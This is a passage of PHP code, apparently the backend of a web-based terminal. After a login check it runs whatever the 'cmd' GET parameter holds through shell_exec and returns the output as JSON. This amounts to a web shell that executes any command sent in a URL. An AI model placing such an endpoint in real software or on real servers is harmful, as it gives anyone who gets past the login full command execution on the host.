Please login before continuing!"); exit; } if (isset($_GET["cmd"])) { // HTTP GET requests $cmd = $_GET["cmd"]; $msg = NULL; $ret = ""; if (isset($_GET["msg"])) { $msg = $_GET["msg"]; } if ($cmd == "ostype") { $ret = strtolower(PHP_OS); } else { $ret = shell_exec($cmd); } // Remove any HTML that could be used for XSS attacks $ret = htmlentities($ret, ENT_QUOTES | ENT_HTML5, 'UTF-8'); $msg = htmlentities($msg, ENT_QUOTES | ENT_HTML5, 'UTF-8'); echo json_encode(array("rsp"=>$ret, "msg" => $msg)); } ?>